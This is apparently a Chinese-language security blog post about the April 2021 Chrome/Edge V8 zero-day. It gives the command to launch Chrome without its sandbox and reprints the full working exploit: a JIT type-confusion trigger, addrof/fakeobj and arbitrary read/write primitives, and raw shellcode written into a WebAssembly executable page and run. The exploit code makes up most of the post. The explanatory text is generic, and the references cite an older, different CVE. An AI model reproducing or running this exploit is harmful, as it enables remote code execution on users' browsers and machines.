2021HW — Chrome 0day漏洞

目錄

簡述

漏洞環境

程序

修復建議

參考

2021HW — Chrome 0day漏洞

簡述

北京時間4月13日凌晨，安全研究人員Rajvardhan Agarwal在推特上發布了一個可遠程代碼執行（RCE）的0Day漏洞，該漏洞可在當前版本的谷歌Chrome瀏覽器和微軟Edge上運行，

為了測驗該漏洞，研究者關閉了瀏覽器Edge 89.0.774.76版本和Chrome 89.0.4389.114版本的沙盒

分析 https://zhuanlan.zhihu.com/p/29097125

原理

遠程系統命令執行

一般出現這種漏洞，是因為應用系統從設計上需要給用戶提供指定的遠程命令操作的介面，比如我們常見的路由器、防火墻、入侵檢測等設備的web管理界面上，一般會給用戶提供一個ping操作的web界面，用戶從web界面輸入目標IP，提交后，后臺會對該IP地址進行一次ping測驗，并回傳測驗結果，

如果，設計者在完成該功能時，沒有做嚴格的安全控制，則可能會導致攻擊者通過該介面提交“意想不到”的命令，從而讓后臺進行執行，從而控制整個后臺服務器，

現在很多的甲方企業都開始實施自動化運維,大量的系統操作會通過"自動化運維平臺"進行操作，在這種平臺上往往會出現遠程系統命令執行的漏洞，

遠程代碼執行

同樣的道理,因為需求設計,后臺有時候也會把用戶的輸入作為代碼的一部分進行執行,也就造成了遠程代碼執行漏洞，
不管是使用了代碼執行的函式,還是使用了不安全的反序列化等等，

因此，如果需要給前端用戶提供操作類的API介面，一定需要對介面輸入的內容進行嚴格的判斷，比如實施嚴格的白名單策略會是一個比較好的方法，

作用

RCE漏洞，可以讓攻擊者直接向后臺服務器遠程注入作業系統命令或者代碼，從而控制后臺系統，

漏洞環境

"C:\Program Files\Google\Chrome\Application\chrome.exe" -no-sandbox

關閉瀏覽器的SanBox功能，該功能默認開啟

簡而言之，正常瀏覽器是不會被漏洞利用的；除非，，，，，，，，，，，

程序

<script src="exploit.js"></script>

/*
/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
    var x = 1;
	x = (_arr[0] ^ 0) + 1;

	x = Math.abs(x);
	x -= 2147483647;
	x = Math.max(x, 0);

	x -= 1;
	if(x==-1) x = 0;

	var arr = new Array(x);
	arr.shift();
	var cor = [1.1, 1.2, 1.3];

	return [arr, cor];
}

for(var i=0;i<0x3000;++i)
    foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);

    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();

通過執行shellcode 命令，攻擊瀏覽器執行RCE命令

修復建議

及時升級到最新版本的谷歌瀏覽器（https://www.google.com/intl/zh-CN/chrome/）以及Edge瀏覽器（https://www.microsoft.com/en-us/edge），

參考

[1] https://bugs.chromium.org/p/chromium/issues/detail?id=1053604

[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418

[3] https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html

[4] https://www.zdnet.com/article/google-patches-chrome-zero-day-under-active-attacks/

[5] https://docs.microsoft.com/zh-cn/deployedge/microsoft-edge-relnotes-security